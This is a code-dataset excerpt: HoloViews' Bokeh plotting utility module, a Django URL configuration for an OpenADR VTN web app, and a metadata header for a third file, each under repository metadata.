hexsha: 398e2a0343f16513abe3f17b2afc3f7f850931a5 | size: 30839 | ext: py | lang: Python
path: holoviews/plotting/bokeh/util.py | repo: archiba/holoviews | head: 8fe3ac1507793e51e2f9bbc020abb49f19b41b90 | licenses: ["BSD-3-Clause"]
stars: null | issues: null | forks: null
from __future__ import absolute_import, division, unicode_literals
import re
import time
import sys
import calendar
import datetime as dt
from collections import defaultdict
from contextlib import contextmanager
import param
import bokeh
import numpy as np
from bokeh.core.json_encoder import serialize_json # noqa (API import)
from bokeh.core.properties import value
from bokeh.core.validation import silence
from bokeh.layouts import WidgetBox, Row, Column
from bokeh.models import tools
from bokeh.models import Model, ToolbarBox, FactorRange, Range1d, Plot, Spacer, CustomJS, GridBox
from bokeh.models.widgets import DataTable, Tabs, Div
from bokeh.plotting import Figure
from bokeh.themes.theme import Theme
try:
from bokeh.themes import built_in_themes
except:
built_in_themes = {}
try:
from bkcharts import Chart
except:
Chart = type(None) # Create stub for isinstance check
from ...core.ndmapping import NdMapping
from ...core.overlay import Overlay
from ...core.util import (
LooseVersion, _getargspec, basestring, callable_name, cftime_types,
cftime_to_timestamp, pd, unique_array, isnumeric, arraylike_types)
from ...core.spaces import get_nested_dmaps, DynamicMap
from ..util import dim_axis_label
bokeh_version = LooseVersion(bokeh.__version__) # noqa
TOOL_TYPES = {
'pan': tools.PanTool,
'xpan': tools.PanTool,
'ypan': tools.PanTool,
'xwheel_pan': tools.WheelPanTool,
'ywheel_pan': tools.WheelPanTool,
'wheel_zoom': tools.WheelZoomTool,
'xwheel_zoom': tools.WheelZoomTool,
'ywheel_zoom': tools.WheelZoomTool,
'zoom_in': tools.ZoomInTool,
'xzoom_in': tools.ZoomInTool,
'yzoom_in': tools.ZoomInTool,
'zoom_out': tools.ZoomOutTool,
'xzoom_out': tools.ZoomOutTool,
'yzoom_out': tools.ZoomOutTool,
'click': tools.TapTool,
'tap': tools.TapTool,
'crosshair': tools.CrosshairTool,
'box_select': tools.BoxSelectTool,
'xbox_select': tools.BoxSelectTool,
'ybox_select': tools.BoxSelectTool,
'poly_select': tools.PolySelectTool,
'lasso_select': tools.LassoSelectTool,
'box_zoom': tools.BoxZoomTool,
'xbox_zoom': tools.BoxZoomTool,
'ybox_zoom': tools.BoxZoomTool,
'hover': tools.HoverTool,
'save': tools.SaveTool,
'undo': tools.UndoTool,
'redo': tools.RedoTool,
'reset': tools.ResetTool,
'help': tools.HelpTool,
'box_edit': tools.BoxEditTool,
'point_draw': tools.PointDrawTool,
'poly_draw': tools.PolyDrawTool,
'poly_edit': tools.PolyEditTool,
'freehand_draw': tools.FreehandDrawTool
}
def convert_timestamp(timestamp):
"""
Converts bokehJS timestamp to datetime64.
"""
datetime = dt.datetime.utcfromtimestamp(timestamp/1000.)
return np.datetime64(datetime.replace(tzinfo=None))
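# Illustrative example (added for clarity, not in the original module):
# convert_timestamp(0) returns numpy.datetime64('1970-01-01T00:00:00.000000'),
# since bokehJS timestamps are milliseconds since the Unix epoch.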
def decode_bytes(array):
"""
Decodes an array, list or tuple of bytestrings to avoid python 3
bokeh serialization errors
"""
if (sys.version_info.major == 2 or not len(array) or
(isinstance(array, arraylike_types) and array.dtype.kind != 'O')):
return array
decoded = [v.decode('utf-8') if isinstance(v, bytes) else v for v in array]
if isinstance(array, np.ndarray):
return np.asarray(decoded)
elif isinstance(array, tuple):
return tuple(decoded)
return decoded
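# Illustrative example (added for clarity, not in the original module):
# decode_bytes([b'a', 'b']) returns ['a', 'b'] on Python 3, while arrays with
# a non-object dtype (e.g. np.array([1, 2])) are returned unchanged.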
def layout_padding(plots, renderer):
"""
Pads Nones in a list of lists of plots with empty plots.
"""
widths, heights = defaultdict(int), defaultdict(int)
for r, row in enumerate(plots):
for c, p in enumerate(row):
if p is not None:
width, height = renderer.get_size(p)
widths[c] = max(widths[c], width)
heights[r] = max(heights[r], height)
expanded_plots = []
for r, row in enumerate(plots):
expanded_plots.append([])
for c, p in enumerate(row):
if p is None:
p = empty_plot(widths[c], heights[r])
elif hasattr(p, 'plot_width') and p.plot_width == 0 and p.plot_height == 0:
p.plot_width = widths[c]
p.plot_height = heights[r]
expanded_plots[r].append(p)
return expanded_plots
def compute_plot_size(plot):
"""
Computes the size of bokeh models that make up a layout such as
figures, rows, columns, widgetboxes and Plot.
"""
if isinstance(plot, GridBox):
ndmapping = NdMapping({(x, y): fig for fig, y, x in plot.children}, kdims=['x', 'y'])
cols = ndmapping.groupby('x')
rows = ndmapping.groupby('y')
width = sum([max([compute_plot_size(f)[0] for f in col]) for col in cols])
height = sum([max([compute_plot_size(f)[1] for f in row]) for row in rows])
return width, height
elif isinstance(plot, (Div, ToolbarBox)):
# Cannot compute size for Div or ToolbarBox
return 0, 0
elif isinstance(plot, (Row, Column, WidgetBox, Tabs)):
if not plot.children: return 0, 0
if isinstance(plot, Row) or (isinstance(plot, ToolbarBox) and plot.toolbar_location not in ['right', 'left']):
w_agg, h_agg = (np.sum, np.max)
elif isinstance(plot, Tabs):
w_agg, h_agg = (np.max, np.max)
else:
w_agg, h_agg = (np.max, np.sum)
widths, heights = zip(*[compute_plot_size(child) for child in plot.children])
return w_agg(widths), h_agg(heights)
elif isinstance(plot, (Figure, Chart)):
if plot.plot_width:
width = plot.plot_width
else:
width = plot.frame_width + plot.min_border_right + plot.min_border_left
if plot.plot_height:
height = plot.plot_height
else:
height = plot.frame_height + plot.min_border_bottom + plot.min_border_top
return width, height
elif isinstance(plot, (Plot, DataTable, Spacer)):
return plot.width, plot.height
else:
return 0, 0
def compute_layout_properties(
width, height, frame_width, frame_height, explicit_width,
explicit_height, aspect, data_aspect, responsive, size_multiplier,
logger=None):
"""
Utility to compute the aspect, plot width/height and sizing_mode
behavior.
Args:
width (int): Plot width
height (int): Plot height
frame_width (int): Plot frame width
frame_height (int): Plot frame height
explicit_width (list): List of user supplied widths
explicit_height (list): List of user supplied heights
aspect (float): Plot aspect
data_aspect (float): Scaling between x-axis and y-axis ranges
responsive (boolean): Whether the plot should resize responsively
size_multiplier (float): Multiplier for supplied plot dimensions
logger (param.Parameters): Parameters object to issue warnings on
Returns:
Returns two dictionaries one for the aspect and sizing modes,
and another for the plot dimensions.
"""
fixed_width = (explicit_width or frame_width)
fixed_height = (explicit_height or frame_height)
fixed_aspect = aspect or data_aspect
if aspect == 'square':
aspect = 1
elif aspect == 'equal':
data_aspect = 1
# Plot dimensions
height = None if height is None else int(height*size_multiplier)
width = None if width is None else int(width*size_multiplier)
frame_height = None if frame_height is None else int(frame_height*size_multiplier)
frame_width = None if frame_width is None else int(frame_width*size_multiplier)
actual_width = frame_width or width
actual_height = frame_height or height
if frame_width is not None:
width = None
if frame_height is not None:
height = None
sizing_mode = 'fixed'
if responsive:
if fixed_height and fixed_width:
responsive = False
if logger:
logger.warning("responsive mode could not be enabled "
"because fixed width and height were "
"specified.")
elif fixed_width:
height = None
sizing_mode = 'fixed' if fixed_aspect else 'stretch_height'
elif fixed_height:
width = None
sizing_mode = 'fixed' if fixed_aspect else 'stretch_width'
else:
width, height = None, None
if fixed_aspect:
if responsive == 'width':
sizing_mode = 'scale_width'
elif responsive == 'height':
sizing_mode = 'scale_height'
else:
sizing_mode = 'scale_both'
else:
if responsive == 'width':
sizing_mode = 'stretch_both'
elif responsive == 'height':
sizing_mode = 'stretch_height'
else:
sizing_mode = 'stretch_both'
if fixed_aspect:
aspect_type = 'data_aspect' if data_aspect else 'aspect'
if fixed_width and fixed_height and aspect:
if aspect == 'equal':
data_aspect = None
if logger:
logger.warning(
"%s value was ignored because absolute width and "
"height values were provided. To set the scaling "
"between the x- and y-axis independent of the "
"width and height values set the data_aspect."
% aspect_type)
elif not data_aspect:
aspect = None
if logger:
logger.warning(
"%s value was ignored because absolute width and "
"height values were provided. Either supply "
"explicit frame_width and frame_height to achieve "
"desired aspect OR supply a combination of width "
"or height and an aspect value." % aspect_type)
elif fixed_width and responsive:
height = None
responsive = False
if logger:
logger.warning("responsive mode could not be enabled "
"because fixed width and aspect were "
"specified.")
elif fixed_height and responsive:
width = None
responsive = False
if logger:
logger.warning("responsive mode could not be enabled "
"because fixed height and aspect were "
"specified.")
elif responsive == 'width':
sizing_mode = 'scale_width'
elif responsive == 'height':
sizing_mode = 'scale_height'
if responsive == 'width' and fixed_width:
responsive = False
if logger:
logger.warning("responsive width mode could not be enabled "
"because a fixed width was defined.")
if responsive == 'height' and fixed_height:
responsive = False
if logger:
logger.warning("responsive height mode could not be enabled "
"because a fixed height was defined.")
match_aspect = False
aspect_scale = 1
aspect_ratio = None
if data_aspect:
match_aspect = True
if (fixed_width and fixed_height):
frame_width, frame_height = frame_width or width, frame_height or height
elif fixed_width or not fixed_height:
height = None
elif fixed_height or not fixed_width:
width = None
aspect_scale = data_aspect
if aspect == 'equal':
aspect_scale = 1
elif responsive:
aspect_ratio = aspect
elif (fixed_width and fixed_height):
pass
elif isnumeric(aspect):
if responsive:
aspect_ratio = aspect
elif fixed_width:
frame_width = actual_width
frame_height = int(actual_width/aspect)
width, height = None, None
else:
frame_width = int(actual_height*aspect)
frame_height = actual_height
width, height = None, None
elif aspect is not None and logger:
logger.warning('aspect value of type %s not recognized, '
'provide a numeric value, \'equal\' or '
'\'square\'.')
return ({'aspect_ratio': aspect_ratio,
'aspect_scale': aspect_scale,
'match_aspect': match_aspect,
'sizing_mode' : sizing_mode},
{'frame_width' : frame_width,
'frame_height': frame_height,
'plot_height' : height,
'plot_width' : width})
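# Illustrative call (hypothetical values, added for clarity): a fixed 400x300
# plot with no aspect constraints and responsive disabled:
#
#   aspect_opts, dim_opts = compute_layout_properties(
#       width=400, height=300, frame_width=None, frame_height=None,
#       explicit_width=[400], explicit_height=[300], aspect=None,
#       data_aspect=None, responsive=False, size_multiplier=1)
#
# yields aspect_opts['sizing_mode'] == 'fixed' and
# dim_opts == {'frame_width': None, 'frame_height': None,
#              'plot_height': 300, 'plot_width': 400}.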
@contextmanager
def silence_warnings(*warnings):
"""
Context manager for silencing bokeh validation warnings.
"""
for warning in warnings:
silence(warning)
try:
yield
finally:
for warning in warnings:
silence(warning, False)
def empty_plot(width, height):
"""
Creates an empty and invisible plot of the specified size.
"""
return Spacer(width=width, height=height)
def font_size_to_pixels(size):
"""
Convert a fontsize to a pixel value
"""
if size is None or not isinstance(size, basestring):
return
conversions = {'em': 16, 'pt': 16/12.}
val = re.findall('\d+', size)
unit = re.findall('[a-z]+', size)
if (val and not unit) or (val and unit[0] == 'px'):
return int(val[0])
elif val and unit[0] in conversions:
return (int(int(val[0]) * conversions[unit[0]]))
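# Illustrative examples (added for clarity, not in the original module):
# font_size_to_pixels('10px') returns 10, font_size_to_pixels('1em') returns
# 16, and non-string input returns None.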
def make_axis(axis, size, factors, dim, flip=False, rotation=0,
label_size=None, tick_size=None, axis_height=35):
factors = list(map(dim.pprint_value, factors))
nchars = np.max([len(f) for f in factors])
ranges = FactorRange(factors=factors)
ranges2 = Range1d(start=0, end=1)
axis_label = dim_axis_label(dim)
reset = "range.setv({start: 0, end: range.factors.length})"
ranges.callback = CustomJS(args=dict(range=ranges), code=reset)
axis_props = {}
if label_size:
axis_props['axis_label_text_font_size'] = value(label_size)
if tick_size:
axis_props['major_label_text_font_size'] = value(tick_size)
tick_px = font_size_to_pixels(tick_size)
if tick_px is None:
tick_px = 8
label_px = font_size_to_pixels(label_size)
if label_px is None:
label_px = 10
rotation = np.radians(rotation)
if axis == 'x':
align = 'center'
# Adjust height to compensate for label rotation
height = int(axis_height + np.abs(np.sin(rotation)) *
((nchars*tick_px)*0.82)) + tick_px + label_px
opts = dict(x_axis_type='auto', x_axis_label=axis_label,
x_range=ranges, y_range=ranges2, plot_height=height,
plot_width=size)
else:
# Adjust width to compensate for label rotation
align = 'left' if flip else 'right'
width = int(axis_height + np.abs(np.cos(rotation)) *
((nchars*tick_px)*0.82)) + tick_px + label_px
opts = dict(y_axis_label=axis_label, x_range=ranges2,
y_range=ranges, plot_width=width, plot_height=size)
p = Figure(toolbar_location=None, tools=[], **opts)
p.outline_line_alpha = 0
p.grid.grid_line_alpha = 0
if axis == 'x':
p.yaxis.visible = False
axis = p.xaxis[0]
if flip:
p.above = p.below
p.below = []
p.xaxis[:] = p.above
else:
p.xaxis.visible = False
axis = p.yaxis[0]
if flip:
p.right = p.left
p.left = []
p.yaxis[:] = p.right
axis.major_label_orientation = rotation
axis.major_label_text_align = align
axis.major_label_text_baseline = 'middle'
axis.update(**axis_props)
return p
def hsv_to_rgb(hsv):
"""
Vectorized HSV to RGB conversion, adapted from:
http://stackoverflow.com/questions/24852345/hsv-to-rgb-color-conversion
"""
h, s, v = (hsv[..., i] for i in range(3))
shape = h.shape
i = np.int_(h*6.)
f = h*6.-i
q = f
t = 1.-f
i = np.ravel(i)
f = np.ravel(f)
i%=6
t = np.ravel(t)
q = np.ravel(q)
s = np.ravel(s)
v = np.ravel(v)
clist = (1-s*np.vstack([np.zeros_like(f),np.ones_like(f),q,t]))*v
#0:v 1:p 2:q 3:t
order = np.array([[0,3,1],[2,0,1],[1,0,3],[1,2,0],[3,1,0],[0,1,2]])
rgb = clist[order[i], np.arange(np.prod(shape))[:,None]]
return rgb.reshape(shape+(3,))
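# Illustrative example (added for clarity, not in the original module):
# hsv_to_rgb(np.array([[0.0, 1.0, 1.0]])) returns approximately
# [[1.0, 0.0, 0.0]], i.e. fully saturated red.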
def pad_width(model, table_padding=0.85, tabs_padding=1.2):
"""
Computes the width of a model and sets up appropriate padding
for Tabs and DataTable types.
"""
if isinstance(model, Row):
vals = [pad_width(child) for child in model.children]
width = np.max([v for v in vals if v is not None])
elif isinstance(model, Column):
vals = [pad_width(child) for child in model.children]
width = np.sum([v for v in vals if v is not None])
elif isinstance(model, Tabs):
vals = [pad_width(t) for t in model.tabs]
width = np.max([v for v in vals if v is not None])
for model in model.tabs:
model.width = width
width = int(tabs_padding*width)
elif isinstance(model, DataTable):
width = model.width
model.width = int(table_padding*width)
elif isinstance(model, (WidgetBox, Div)):
width = model.width
elif model:
width = model.plot_width
else:
width = 0
return width
def pad_plots(plots):
"""
    Accepts a grid of bokeh plots in the form of a list of lists and
wraps any DataTable or Tabs in a WidgetBox with appropriate
padding. Required to avoid overlap in gridplot.
"""
widths = []
for row in plots:
row_widths = []
for p in row:
width = pad_width(p)
row_widths.append(width)
widths.append(row_widths)
plots = [[WidgetBox(p, width=w) if isinstance(p, (DataTable, Tabs)) else p
for p, w in zip(row, ws)] for row, ws in zip(plots, widths)]
return plots
def filter_toolboxes(plots):
"""
    Filters toolboxes out of a list of plots so that they can be composed
    into a larger plot.
"""
if isinstance(plots, list):
plots = [filter_toolboxes(plot) for plot in plots]
elif hasattr(plots, 'children'):
plots.children = [filter_toolboxes(child) for child in plots.children
if not isinstance(child, ToolbarBox)]
return plots
def py2js_tickformatter(formatter, msg=''):
"""
Uses py2js to compile a python tick formatter to JS code
"""
try:
from pscript import py2js
except ImportError:
param.main.param.warning(
msg+'Ensure pscript is installed ("conda install pscript" '
'or "pip install pscript")')
return
try:
jscode = py2js(formatter, 'formatter')
except Exception as e:
error = 'Pyscript raised an error: {0}'.format(e)
error = error.replace('%', '%%')
param.main.param.warning(msg+error)
return
args = _getargspec(formatter).args
arg_define = 'var %s = tick;' % args[0] if args else ''
return_js = 'return formatter();\n'
jsfunc = '\n'.join([arg_define, jscode, return_js])
match = re.search('(formatter \= function \(.*\))', jsfunc )
return jsfunc[:match.start()] + 'formatter = function ()' + jsfunc[match.end():]
def get_tab_title(key, frame, overlay):
"""
Computes a title for bokeh tabs from the key in the overlay, the
element and the containing (Nd)Overlay.
"""
if isinstance(overlay, Overlay):
if frame is not None:
title = []
if frame.label:
title.append(frame.label)
if frame.group != frame.params('group').default:
title.append(frame.group)
else:
title.append(frame.group)
else:
title = key
title = ' '.join(title)
else:
title = ' | '.join([d.pprint_value_string(k) for d, k in
zip(overlay.kdims, key)])
return title
def filter_batched_data(data, mapping):
"""
Iterates over the data and mapping for a ColumnDataSource and
replaces columns with repeating values with a scalar. This is
    purely an optimization for scalar types.
"""
for k, v in list(mapping.items()):
if isinstance(v, dict) and 'field' in v:
if 'transform' in v:
continue
v = v['field']
elif not isinstance(v, basestring):
continue
values = data[v]
try:
if len(unique_array(values)) == 1:
mapping[k] = values[0]
del data[v]
except:
pass
def cds_column_replace(source, data):
"""
Determine if the CDS.data requires a full replacement or simply
needs to be updated. A replacement is required if untouched
columns are not the same length as the columns being updated.
"""
current_length = [len(v) for v in source.data.values()
if isinstance(v, (list,)+arraylike_types)]
new_length = [len(v) for v in data.values() if isinstance(v, (list, np.ndarray))]
untouched = [k for k in source.data if k not in data]
return bool(untouched and current_length and new_length and current_length[0] != new_length[0])
@contextmanager
def hold_policy(document, policy, server=False):
"""
    Context manager to temporarily override the hold policy.
"""
old_policy = document._hold
document._hold = policy
try:
yield
finally:
if server and not old_policy:
document.unhold()
else:
document._hold = old_policy
def recursive_model_update(model, props):
"""
Recursively updates attributes on a model including other
    models. If the type of the new model matches the old model, its
    properties are simply updated; otherwise the model is replaced.
"""
updates = {}
valid_properties = model.properties_with_values()
for k, v in props.items():
if isinstance(v, Model):
nested_model = getattr(model, k)
if type(v) is type(nested_model):
nested_props = v.properties_with_values(include_defaults=False)
recursive_model_update(nested_model, nested_props)
else:
setattr(model, k, v)
elif k in valid_properties and v != valid_properties[k]:
updates[k] = v
model.update(**updates)
def update_shared_sources(f):
"""
    Decorator that ensures data sources shared between multiple
    plots are cleared and updated appropriately, avoiding warnings and
    allowing empty frames on subplots. Expects a list of
    shared_sources and a mapping of the expected columns for
    each source in the plot's handles.
"""
def wrapper(self, *args, **kwargs):
source_cols = self.handles.get('source_cols', {})
shared_sources = self.handles.get('shared_sources', [])
for source in shared_sources:
source.data.clear()
if self.document and self.document._held_events:
self.document._held_events = self.document._held_events[:-1]
ret = f(self, *args, **kwargs)
for source in shared_sources:
expected = source_cols[id(source)]
found = [c for c in expected if c in source.data]
empty = np.full_like(source.data[found[0]], np.NaN) if found else []
patch = {c: empty for c in expected if c not in source.data}
source.data.update(patch)
return ret
return wrapper
def categorize_array(array, dim):
"""
Uses a Dimension instance to convert an array of values to categorical
(i.e. string) values and applies escaping for colons, which bokeh
treats as a categorical suffix.
"""
return np.array([dim.pprint_value(x) for x in array])
class periodic(object):
"""
Mocks the API of periodic Thread in hv.core.util, allowing a smooth
API transition on bokeh server.
"""
def __init__(self, document):
self.document = document
self.callback = None
self.period = None
self.count = None
self.counter = None
self._start_time = None
self.timeout = None
self._pcb = None
@property
def completed(self):
return self.counter is None
def start(self):
self._start_time = time.time()
if self.document is None:
raise RuntimeError('periodic was registered to be run on bokeh'
'server but no document was found.')
self._pcb = self.document.add_periodic_callback(self._periodic_callback, self.period)
def __call__(self, period, count, callback, timeout=None, block=False):
if isinstance(count, int):
if count < 0: raise ValueError('Count value must be positive')
elif not type(count) is type(None):
raise ValueError('Count value must be a positive integer or None')
self.callback = callback
self.period = period*1000.
self.timeout = timeout
self.count = count
self.counter = 0
return self
def _periodic_callback(self):
self.callback(self.counter)
self.counter += 1
if self.timeout is not None:
dt = (time.time() - self._start_time)
if dt > self.timeout:
self.stop()
if self.counter == self.count:
self.stop()
def stop(self):
self.counter = None
self.timeout = None
try:
self.document.remove_periodic_callback(self._pcb)
except ValueError: # Already stopped
pass
self._pcb = None
def __repr__(self):
return 'periodic(%s, %s, %s)' % (self.period,
self.count,
callable_name(self.callback))
def __str__(self):
return repr(self)
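# Illustrative usage sketch (hypothetical names, added for clarity): on a
# bokeh server document `doc`, with a user-supplied callback `update`,
#
#   cb = periodic(doc)
#   cb(period=0.5, count=10, callback=update)
#   cb.start()
#
# registers `update` as a periodic callback firing every 0.5 seconds for at
# most 10 invocations.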
def attach_periodic(plot):
"""
Attaches plot refresh to all streams on the object.
"""
def append_refresh(dmap):
for dmap in get_nested_dmaps(dmap):
dmap.periodic._periodic_util = periodic(plot.document)
return plot.hmap.traverse(append_refresh, [DynamicMap])
def date_to_integer(date):
"""Converts support date types to milliseconds since epoch
Attempts highest precision conversion of different datetime
formats to milliseconds since the epoch (1970-01-01 00:00:00).
If datetime is a cftime with a non-standard calendar the
caveats described in hv.core.util.cftime_to_timestamp apply.
Args:
date: Date- or datetime-like object
Returns:
Milliseconds since 1970-01-01 00:00:00
"""
if pd and isinstance(date, pd.Timestamp):
try:
date = date.to_datetime64()
except:
date = date.to_datetime()
if isinstance(date, np.datetime64):
return date.astype('datetime64[ms]').astype(float)
elif isinstance(date, cftime_types):
return cftime_to_timestamp(date, 'ms')
if hasattr(date, 'timetuple'):
dt_int = calendar.timegm(date.timetuple())*1000
else:
raise ValueError('Datetime type not recognized')
return dt_int
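# Illustrative example (added for clarity, not in the original module):
# date_to_integer(np.datetime64('1970-01-02')) returns 86400000.0, i.e. one
# day expressed in milliseconds since the epoch.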
def glyph_order(keys, draw_order=[]):
"""
Orders a set of glyph handles using regular sort and an explicit
sort order. The explicit draw order must take the form of a list
of glyph names while the keys should be glyph names with a custom
    suffix. The draw order may only match a subset of the keys and any
matched items will take precedence over other entries.
"""
keys = sorted(keys)
def order_fn(glyph):
matches = [item for item in draw_order if glyph.startswith(item)]
return ((draw_order.index(matches[0]), glyph) if matches else
(1e9+keys.index(glyph), glyph))
return sorted(keys, key=order_fn)
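# Illustrative example (added for clarity, not in the original module):
# glyph_order(['scatter_1', 'line_1', 'annotation_1'], draw_order=['line'])
# returns ['line_1', 'annotation_1', 'scatter_1']: explicitly ordered glyphs
# come first, the rest keep their alphabetical order.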
def colormesh(X, Y):
"""
Generates line paths for a quadmesh given 2D arrays of X and Y
coordinates.
"""
X1 = X[0:-1, 0:-1].ravel()
Y1 = Y[0:-1, 0:-1].ravel()
X2 = X[1:, 0:-1].ravel()
Y2 = Y[1:, 0:-1].ravel()
X3 = X[1:, 1:].ravel()
Y3 = Y[1:, 1:].ravel()
X4 = X[0:-1, 1:].ravel()
Y4 = Y[0:-1, 1:].ravel()
X = np.column_stack([X1, X2, X3, X4, X1])
Y = np.column_stack([Y1, Y2, Y3, Y4, Y1])
return X, Y
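# Illustrative example (added for clarity, not in the original module): for a
# 2x2 coordinate grid X, Y = np.meshgrid([0, 1], [0, 1]), colormesh(X, Y)
# returns a single closed quad path, X == [[0, 0, 1, 1, 0]] and
# Y == [[0, 1, 1, 0, 0]].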
def theme_attr_json(theme, attr):
if isinstance(theme, str) and theme in built_in_themes:
return built_in_themes[theme]._json['attrs'].get(attr, {})
elif isinstance(theme, Theme):
return theme._json['attrs'].get(attr, {})
else:
return {}
def multi_polygons_data(element):
"""
Expands polygon data which contains holes to a bokeh multi_polygons
representation. Multi-polygons split by nans are expanded and the
correct list of holes is assigned to each sub-polygon.
"""
paths = element.split(datatype='array', dimensions=element.kdims)
xs, ys = ([path[:, idx] for path in paths] for idx in (0, 1))
holes = element.holes()
xsh, ysh = [], []
for x, y, multi_hole in zip(xs, ys, holes):
xhs = [[h[:, 0] for h in hole] for hole in multi_hole]
yhs = [[h[:, 1] for h in hole] for hole in multi_hole]
array = np.column_stack([x, y])
splits = np.where(np.isnan(array[:, :2].astype('float')).sum(axis=1))[0]
arrays = np.split(array, splits+1) if len(splits) else [array]
multi_xs, multi_ys = [], []
for i, (path, hx, hy) in enumerate(zip(arrays, xhs, yhs)):
if i != (len(arrays)-1):
path = path[:-1]
multi_xs.append([path[:, 0]]+hx)
multi_ys.append([path[:, 1]]+hy)
xsh.append(multi_xs)
ysh.append(multi_ys)
return xsh, ysh
def match_dim_specs(specs1, specs2):
"""Matches dimension specs used to link axes.
    Axis dimension specs consist of a list of tuples corresponding
to each dimension, each tuple spec has the form (name, label, unit).
The name and label must match exactly while the unit only has to
match if both specs define one.
"""
if (specs1 is None or specs2 is None) or (len(specs1) != len(specs2)):
return False
for spec1, spec2 in zip(specs1, specs2):
for s1, s2 in zip(spec1, spec2):
if s1 is None or s2 is None:
continue
if s1 != s2:
return False
return True
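# Illustrative example (added for clarity, not in the original module):
# match_dim_specs([('x', 'x-label', None)], [('x', 'x-label', 'm')]) returns
# True, because the unit only has to agree when both specs define one.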
avg_line_length: 34.303671 | max_line_length: 118 | alphanum_fraction: 0.608904
hexsha: 26c463caa65b66df689bea6215288b6e4d454215 | size: 5234 | ext: py | lang: Python
path: kisensum/openadr/openadr/vtn/urls.py | repo: ChargePoint/volttron-applications | head: 8d99c01a93f7c1ea98d4e4b0cfcefe85fe26320b | licenses: ["BSD-3-Clause"]
stars: null | issues: 4 (2021-03-19T23:36:34.000Z to 2021-12-13T19:45:54.000Z) | forks: 1 (2020-05-25T05:03:55.000Z to 2020-05-25T05:03:55.000Z)
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2017, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
from django.conf.urls import url
from django.views.generic import RedirectView
from vtn import views
from django.contrib.auth import views as auth_views
from django.contrib.auth.decorators import login_required
from rest_framework.routers import DefaultRouter
router = DefaultRouter()
app_name = 'vtn'
urlpatterns = [
url(r'^$', RedirectView.as_view(url='/vtn/login')),
url(r'^home/$',views.overview, name='home'),
url(r'^login/$', auth_views.login, {'template_name': 'login.html'}, name='login'),
url(r'^logout/$', auth_views.logout, {'template_name': 'logged_out.html'}, name='logout'),
url(r'^customer-detail/(?P<pk>\w+)$', views.CustomerDetailView.as_view(), name='customer_detail'),
url(r'^site-detail/(?P<pk>\w+)$', views.SiteDetailView.as_view(), name='site_detail'),
url(r'^dr_event/$', login_required(views.DREventAdd.as_view()), name='dr_event'),
url(r'^customer-edit/(?P<pk>[0-9]+)$', views.CustomerUpdate.as_view(), name='customer_update'),
url(r'customer/add/$', views.CustomerCreate.as_view(), name='customer_add'),
url(r'^export/(?P<pk>[0-9]+)/$', login_required(views.dr_event_export), name='export_dr_events_csv'),
url(r'^report/$', login_required(views.report), name='report'),
url(r'^export/filter/$', login_required(views.get_more_tables), name='get_more_tables'),
url(r'^dr-event/add/$', login_required(views.get_dr_event_form), name='get_dr_event_form'),
url(r'site/create/(?P<pk>[0-9]+)/$', login_required(views.CreateSiteView.as_view()), name='create_site'),
url(r'^home/(?P<pk>[0-9]+)/$', login_required(views.delete_dr_event), name='dr_event_delete'),
url(r'dr_event/(?P<pk>[0-9]+)/$', login_required(views.dr_event_dispatch), name='dr_event_dispatch'),
url(r'dr_event/view/(?P<pk>[0-9]+)/$', login_required(views.DREventCreate.as_view()), name='dr_event_update'),
url(r'dr_event/detail/(?P<pk>[0-9]+)/$', login_required(views.DREventDetail.as_view()), name='dr_event_detail'),
url(r'dr_event/detail/(?P<pk>[0-9]+)/customer/$', login_required(views.get_dr_event_details), name='dr_event_get_details'),
url(r'^home/(?P<pk>[0-9]+)/$', login_required(views.cancel_dr_event), name='dr_event_cancel'),
url(r'password_change/$', login_required(views.change_password), name='change_password'),
]
urlpatterns += router.urls
avg_line_length: 54.520833 | max_line_length: 127 | alphanum_fraction: 0.748376
hexsha: 884783b3b22e9942259648a09e1d2dbe6ddfb654 | size: 210 | ext: py | lang: Python
path: pommerman/agents/random_agent.py | repo: alekseynp/playground | head: 523cc924fe9fd269a8eb3e29c45ace1c5c85b12c | licenses: ["Apache-2.0"]
